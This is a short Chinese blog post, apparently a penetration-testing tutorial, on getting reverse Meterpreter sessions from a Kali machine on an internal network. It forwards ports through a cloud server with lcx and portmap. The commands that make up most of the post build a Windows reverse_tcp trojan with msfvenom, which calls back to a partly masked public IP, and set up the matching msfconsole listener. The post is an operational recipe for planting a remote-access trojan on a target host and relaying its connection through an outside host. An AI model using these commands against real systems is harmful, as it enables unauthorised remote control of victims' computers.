kali内网反弹session

发布于 2020-06-24  424 次阅读


0x01 简介

在使用kali做渗透时,经常因为处在内网而不能进行反弹session,应该如何解决呢?提权时遇到内网主机,登录时需要对端口进行转发。所以我们可以反向操作,把kali当做内网主机,把kali的端口转发到公网主机端口上。让别人连接我们的kali,从而达到反弹session的目的。

0x02 过程

端口转发>

工具下载

#云服务器上运行
lcx.exe -listen 6666 8888

#kali运行
./portmap -m 3 -h1 127.0.0.1 -p1 4444 -h2 122.***.53 -p2 6666

#portmap -m 3 -h1 本地ip -p1 本地端口 -h2 公网ip -p2 公网端口
#因为没找到适用于Linux的lcx,所以使用portmap代替

0x03 演示

#演示的话我们就生成一个木马,在目标主机上直接运行
#木马连接的ip是我们进行端口转发的公网ip和端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=122.***.53 LPORT=8888 -f exe > shell.exe

#本地监听
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 127.0.0.1
msf > set lport 4444
msf > run

0x04 总结

如果转发失败,可能是本地监听的4444端口没有开启,先去目标主机上运行木马,只要目标有数据反弹到公网ip的端口上面,这时在kali中进行端口转发就可以了


我不懂世界到底在热闹些什么